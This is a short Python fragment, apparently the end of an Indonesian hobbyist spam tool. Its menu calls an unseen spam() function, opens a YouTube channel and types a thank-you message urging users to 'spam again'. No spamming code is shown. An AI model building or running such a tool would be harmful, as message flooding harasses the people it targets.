    pil=input(f"  Pilih No  : ")
    if pil == "1":
        spam()
    if pil == "2":
        os.system("xdg-open https://youtube.com/channel/UCel8C59vmVfh54VXRF3BZ7Q")
    if pil == "3":
        autoketik("ThankYou Ngab Yang Udah SubsCribe, Jangan Lupa Spam Lagi")
        sys.exit()

start()

